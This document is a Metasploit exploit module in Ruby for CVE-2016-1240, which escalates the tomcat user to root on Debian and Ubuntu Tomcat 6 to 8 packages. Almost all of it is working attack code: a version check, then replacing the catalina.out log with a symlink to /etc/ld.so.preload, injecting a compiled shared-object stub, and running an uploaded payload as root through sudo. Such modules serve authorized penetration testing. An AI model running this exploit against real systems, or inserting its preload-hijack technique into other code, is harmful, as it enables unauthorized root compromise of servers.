Apache Tomcat On Ubuntu Log Init Privilege Escalation

`###  
#  
# This exploit sample shows how an exploit module could be written to exploit  
# a bug in a command on a linux computer for priv esc.  
#  
###  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ManualRanking  
  
include Msf::Exploit::Retry  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Post::Linux::Compile  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Apache Tomcat on Ubuntu Log Init Privilege Escalation',  
'Description' => %q{  
Tomcat (6, 7, 8) packages provided by default repositories on Debian-based  
distributions (including Debian, Ubuntu etc.) provide a vulnerable  
tomcat init script that allows local attackers who have already gained access  
to the tomcat account (for example, by exploiting an RCE vulnerability  
in a java web application hosted on Tomcat, uploading a webshell etc.) to  
escalate their privileges from tomcat user to root and fully compromise the  
target system.  
  
Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'Dawid Golunski <[email protected]>' # original PoC, analysis, discovery  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PYTHON ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'DefaultOptions' => {  
'PrependFork' => true,  
'WfsDelay' => 1800 # 30min  
},  
'References' => [  
[ 'EDB', '40450' ],  
[ 'URL', 'https://ubuntu.com/security/notices/USN-3081-1'],  
[ 'URL', 'http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html'],  
[ 'CVE', '2016-1240']  
],  
'DisclosureDate' => '2016-09-30',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]  
}  
)  
)  
register_options [  
OptString.new('CATALINA', [ true, 'Location of catalina.out file', '/var/log/tomcat8/catalina.out' ])  
]  
register_advanced_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),  
]  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def preload  
'/etc/ld.so.preload'  
end  
  
def catalina  
datastore['CATALINA']  
end  
  
def check  
package = cmd_exec('dpkg -l tomcat[6-8] | grep \'^i\'')  
if package.nil? || package.empty?  
return CheckCode::Safe('Unable to execute command to determine installed pacakges')  
end  
  
package = package.gsub('\s+', ' ') # replace whitespace with space so we can split easy  
package = package.split(' ')  
# 0 is ii for installed  
# 1 is tomcat# for package name  
# 2 is version number  
package = Rex::Version.new(package[2])  
  
if (package.to_s.start_with?('8') && package < Rex::Version.new('8.0.32-1ubuntu1.2')) ||  
(package.to_s.start_with?('7') && package < Rex::Version.new('7.0.52-1ubuntu0.7')) ||  
(package.to_s.start_with?('6') && package < Rex::Version.new('6.0.35-1ubuntu3.8'))  
return CheckCode::Appears("Vulnerable app version detected: #{package}")  
end  
  
CheckCode::Safe("Unexploitable tomcat packages found: #{package}")  
end  
  
def exploit  
# Check if we're already root  
if is_root? && !datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'  
end  
  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
unless file? catalina  
fail_with Failure::BadConfig, "#{catalina} not found or still symlinked"  
end  
  
if file? preload  
fail_with Failure::BadConfig, "#{preload} found, check file as it needs to be removed for exploitation"  
end  
  
vprint_status("Creating backup of #{catalina}")  
@catalina_content = read_file(catalina)  
path = store_loot(  
catalina,  
'text/plain',  
rhost,  
@catalina_content,  
'catalina.out'  
)  
print_good("Original #{catalina} backed up to #{path}")  
  
if live_compile?  
# upload our privesc stub  
so_stub = ".#{rand_text_alphanumeric(5..10)}.so"  
so_stub_path = "#{base_dir}/#{so_stub}"  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"  
  
# Upload exploit stub  
vprint_status "Compiling exploit stub: #{so_stub_path}"  
upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'  
else  
payload_path = '/tmp/.jMeY5vToQl'  
so_stub = '.ny9NyKEPJ.so'  
so_stub_path = "/tmp/#{so_stub}"  
  
write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))  
end  
register_file_for_cleanup(so_stub_path)  
  
# Upload payload executable  
vprint_status("Uploading Payload to #{payload_path}")  
upload_and_chmodx payload_path, generate_payload_exe  
register_file_for_cleanup(payload_path)  
  
# delete the log and symlink ld.so.preload  
vprint_status("Deleting #{catalina}")  
rm_f(catalina)  
vprint_status("Creating symlink from #{preload} to #{catalina}")  
cmd_exec("ln -s #{preload} #{catalina}")  
register_file_for_cleanup(catalina)  
  
# we now need tomcat to restart  
print_good("Waiting #{datastore['WfsDelay']} seconds on tomcat to re-open the logs aka a Tomcat service restart")  
succeeded = retry_until_truthy(timeout: datastore['WfsDelay']) do  
file? preload  
end  
  
unless succeeded  
print_error("#{preload} not found, exploit aborted")  
return  
end  
register_file_for_cleanup(preload)  
  
# now that we can write to ld.so.preload, use a SUID binary to execute our stub  
print_status("injecting #{so_stub_path} into #{preload}")  
cmd_exec "echo #{so_stub_path} > #{preload}"  
print_status('Escalating payload privileges via SUID binary (sudo)')  
cmd_exec 'sudo --help 2>/dev/null >/dev/null'  
print_status('Executing payload')  
cmd_exec payload_path  
end  
  
def cleanup  
if @catalina_content.nil?  
cmd_exec("touch #{catalina}")  
else  
write_file(catalina, @catalina_content)  
end  
super  
end  
end  
`